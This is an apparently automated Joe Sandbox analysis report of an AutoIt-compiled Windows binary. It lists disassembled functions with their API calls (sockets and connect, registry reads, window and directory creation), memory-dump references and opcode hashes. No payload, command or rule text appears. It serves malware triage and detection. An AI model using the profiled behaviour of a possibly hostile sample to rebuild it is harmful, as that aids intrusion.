                                                                                                                                                                                      • Opcode ID: 2effc313ae28992e6801c75af1d851146da5e78ca0859d7c1e7aa2b9ff0fb8e0
                                                                                                                                                                                      • Instruction ID: f5f5f77ff9096490322bcdfed58f673aac6ce1f751d96d7749206eedca1fa955
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2effc313ae28992e6801c75af1d851146da5e78ca0859d7c1e7aa2b9ff0fb8e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E1AFB1A00319AFDF10DFA9C891BAE77B9EF48315F148429FD45AB281E7709D49CB90
                                                                                                                                                                                      Function 0095BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                                                                                      • Opcode ID: 786efb2eb479e07fc29ba544acfab7575b34ea5cf75ce8e14a9df6dee73293f6
                                                                                                                                                                                      • Instruction ID: 746dfe7bec70ce414725bc1a043b62521eb86d106af1df896e22b78af15447cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 786efb2eb479e07fc29ba544acfab7575b34ea5cf75ce8e14a9df6dee73293f6
                                                                                                                                                                                      • Instruction Fuzzy Hash: F091B2B1A04319AFDF24DFA5CC44FAEB7B8AF84711F108519F915AB281D7709949CFA0
                                                                                                                                                                                      Function 0095936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • select.WS2_32(00000000,00000001,00000000,00000000,?,000003E8,0099DBF0), ref: 00959409
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00959416
                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0095943A
                                                                                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00959452
                                                                                                                                                                                      • _strlen.LIBCMT ref: 00959484
                                                                                                                                                                                      • _memmove.LIBCMT ref: 009594CA
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 009594F7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2795762555-0
                                                                                                                                                                                      • Opcode ID: d1a303c528dad5cdf0476445226040890d651f1b1cca865925fc05f754260521
                                                                                                                                                                                      • Instruction ID: 3e626bae95f438cc03dd0010def111c74d679f679b1254aee8df198e39a62090
                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a303c528dad5cdf0476445226040890d651f1b1cca865925fc05f754260521
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D417FB5604214EFDB14EF65CC85FAEB7B9AB88310F104259F916972E2DB34AE05CB60
                                                                                                                                                                                      Function 0091EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0091EADA,?,?), ref: 0091EB27
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0091EADA,?,?), ref: 00974B26
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0091EADA,?,?), ref: 00974B65
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,0091EADA,?,?), ref: 00974B94
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                                                                                      • Opcode ID: 425d6d6c1d0c6c465a1064b54fb7ba43bed54eb0331139ca1ef744a6f178bc08
                                                                                                                                                                                      • Instruction ID: e86d8cb475afb908c24be584aaf8c5c38deee90cae314cd0bf3626e0d1a1bbb3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 425d6d6c1d0c6c465a1064b54fb7ba43bed54eb0331139ca1ef744a6f178bc08
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02117C71A06108BEEB049FA8CC86EFE77BCEF44354F104069B506E71E1EA70AE01EB50
                                                                                                                                                                                      Function 00902E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00902ECB
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00902EEC
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00902F00
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00902F09
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                      • Opcode ID: 5a025f95986de7beb6d86d0a812e080f00eaa437297b2075dcb50500ee805cd5
                                                                                                                                                                                      • Instruction ID: 5d74018083ca134dd166f19ba58b3d3d774b311884d21bd1599ec3e0aa99ff84
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a025f95986de7beb6d86d0a812e080f00eaa437297b2075dcb50500ee805cd5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF030719552D07AEB3097576C48E672E7DEBC7F60F01401EF904921A1C16508A1EAB4
                                                                                                                                                                                      Function 00946D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00903B1E: _wcsncpy.LIBCMT ref: 00903B32
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00946DBA
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00946DC5
                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00946DD9
                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00946DFB
                                                                                                                                                                                        • Part of subcall function 00946D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00946E31
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3633006590-0
                                                                                                                                                                                      • Opcode ID: e81cfff2b5a34af2d5162ca674d790169b6440704bb4117affdb71b63a6f4586
                                                                                                                                                                                      • Instruction ID: b2a105f6bbb1e119c1b1c53fafcabd0907c52dcd31480483a1c11063d4d3b564
                                                                                                                                                                                      • Opcode Fuzzy Hash: e81cfff2b5a34af2d5162ca674d790169b6440704bb4117affdb71b63a6f4586
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521B4B5A053149ADB247774EC4AFEB33ECCF52720F204556E425C71E2EB20CE949B56
                                                                                                                                                                                      Function 00959122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0095ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0095ACF5
                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00959160
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0095916F
                                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 0095918B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3701255441-0
                                                                                                                                                                                      • Opcode ID: 14c183c224f5f538956d195ef146da032cd69806b1f708afe195c26a041507e8
                                                                                                                                                                                      • Instruction ID: 85b10b9ea4b7eb69658c5bb19b314896510df60a30e18da375bcb98578950947
                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c183c224f5f538956d195ef146da032cd69806b1f708afe195c26a041507e8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F21AC75204610AFDB00FF28CC89B6E77A9EF88720F048419F906AB3D2CB70E8058B51
                                                                                                                                                                                      Function 00903DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00903F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009034E2,?,00000001), ref: 00903FCD
                                                                                                                                                                                      • _free.LIBCMT ref: 00973C27
                                                                                                                                                                                      • _free.LIBCMT ref: 00973C6E
                                                                                                                                                                                        • Part of subcall function 0090BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,009C22E8,?,00000000,?,00903E2E,?,00000000,?,0099DBF0,00000000,?), ref: 0090BE8B
                                                                                                                                                                                        • Part of subcall function 0090BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00903E2E,?,00000000,?,0099DBF0,00000000,?,00000002), ref: 0090BEA7
                                                                                                                                                                                        • Part of subcall function 0090BDF0: __wsplitpath.LIBCMT ref: 0090BF19
                                                                                                                                                                                        • Part of subcall function 0090BDF0: _wcscpy.LIBCMT ref: 0090BF31
                                                                                                                                                                                        • Part of subcall function 0090BDF0: _wcscat.LIBCMT ref: 0090BF46
                                                                                                                                                                                        • Part of subcall function 0090BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0090BF56
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                                      • API String ID: 1510338132-1757145024
                                                                                                                                                                                      • Opcode ID: 70f029531776d3aa1d3d9a28a79a1583bf657122eef68b978658314c2c7a3caa
                                                                                                                                                                                      • Instruction ID: 4787168df0c649722e348b46ce35312f93701df84632f402ef9a14929387305d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 70f029531776d3aa1d3d9a28a79a1583bf657122eef68b978658314c2c7a3caa
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF917372910219AFCF04EFA4CC92AEEB7B8BF44310F148519F856AB291DB749E45DB50
                                                                                                                                                                                      Function 0092413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __getstream.LIBCMT ref: 0092418E
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 009241C9
                                                                                                                                                                                      • __wopenfile.LIBCMT ref: 009241D9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                                                      • String ID: <G
                                                                                                                                                                                      • API String ID: 1820251861-2138716496
                                                                                                                                                                                      • Opcode ID: a85c12277dc0d6cc284c3a6e1536db9fa30dab82dcf104669d0c318c8f9d942d
                                                                                                                                                                                      • Instruction ID: 63002e102dbe76fa75efe1dca0cd7032e473240d433acccb10e6f88957fa44c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: a85c12277dc0d6cc284c3a6e1536db9fa30dab82dcf104669d0c318c8f9d942d
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE113A30904236DADB10BFB0BC4276F36B8AFA4360F048924E424DB28EEB74C9519761
                                                                                                                                                                                      Function 0091C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0091C948,SwapMouseButtons,00000004,?), ref: 0091C979
                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0091C948,SwapMouseButtons,00000004,?,?,?,?,0091BF22), ref: 0091C99A
                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,0091C948,SwapMouseButtons,00000004,?,?,?,?,0091BF22), ref: 0091C9BC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                      • Opcode ID: cbcde568ed21cba2a10d9dbd18a081273c56628ddafd3f6bb12bd149d40a256b
                                                                                                                                                                                      • Instruction ID: 6c1c6ffc060c1d6fdd739da1591854d63c754ef00f95e2880edf2bbc2e30af02
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbcde568ed21cba2a10d9dbd18a081273c56628ddafd3f6bb12bd149d40a256b
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC1179B665120CBFDB118FA4DC44EEE7BBCEF05750F10446AA841E7210E231AE80AB60
                                                                                                                                                                                      Function 0093A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d05fe2d28cc70d3ef27487118c3ee2c0c054160edf37b5c32a5c11e22439b200
                                                                                                                                                                                      • Instruction ID: e29cd21c8b46e542eba281f641d0497ee042dfacad8f3746cc3be59b9ad46536
                                                                                                                                                                                      • Opcode Fuzzy Hash: d05fe2d28cc70d3ef27487118c3ee2c0c054160edf37b5c32a5c11e22439b200
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FC13A75A0021AEBCB14CFA4C984EAEB7B6FF48710F104599E942EB291D734DE41DFA1
                                                                                                                                                                                      Function 0094CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009041A7: _fseek.LIBCMT ref: 009041BF
                                                                                                                                                                                        • Part of subcall function 0094CE59: _wcscmp.LIBCMT ref: 0094CF49
                                                                                                                                                                                        • Part of subcall function 0094CE59: _wcscmp.LIBCMT ref: 0094CF5C
                                                                                                                                                                                      • _free.LIBCMT ref: 0094CDC9
                                                                                                                                                                                      • _free.LIBCMT ref: 0094CDD0
                                                                                                                                                                                      • _free.LIBCMT ref: 0094CE3B
                                                                                                                                                                                        • Part of subcall function 009228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00928715,00000000,009288A3,00924673,?), ref: 009228DE
                                                                                                                                                                                        • Part of subcall function 009228CA: GetLastError.KERNEL32(00000000,?,00928715,00000000,009288A3,00924673,?), ref: 009228F0
                                                                                                                                                                                      • _free.LIBCMT ref: 0094CE43
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1552873950-0
                                                                                                                                                                                      • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                                      • Instruction ID: f15234f0243d2e589bfa9aacbf4c864e32223908e82ca9e3527b8e1423414e49
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                                                      • Instruction Fuzzy Hash: F1515BF1D04218AFDF559F64DC81BAEBBB9EF48300F1040AEB219A3281D7715E908F29
                                                                                                                                                                                      Function 00901E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00901E87
                                                                                                                                                                                        • Part of subcall function 009038E4: _memset.LIBCMT ref: 00903965
                                                                                                                                                                                        • Part of subcall function 009038E4: _wcscpy.LIBCMT ref: 009039B5
                                                                                                                                                                                        • Part of subcall function 009038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009039C6
                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00901EDC
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00901EEB
                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00974526
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1378193009-0
                                                                                                                                                                                      • Opcode ID: cb60abace5f8f7c5e8f8ad66a1fc12a6ed539b15304fb8e1b45878eb5ce730f0
                                                                                                                                                                                      • Instruction ID: 7f4269c6c5010a0a63ab74bbe0a304a0fb7c0696c98870026a384ec4d4e0051e
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb60abace5f8f7c5e8f8ad66a1fc12a6ed539b15304fb8e1b45878eb5ce730f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D21F6B2908394AFE732CB24C855FEBBBEC9B02308F04449DF69E57282C3745A84DB51
                                                                                                                                                                                      Function 009592C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
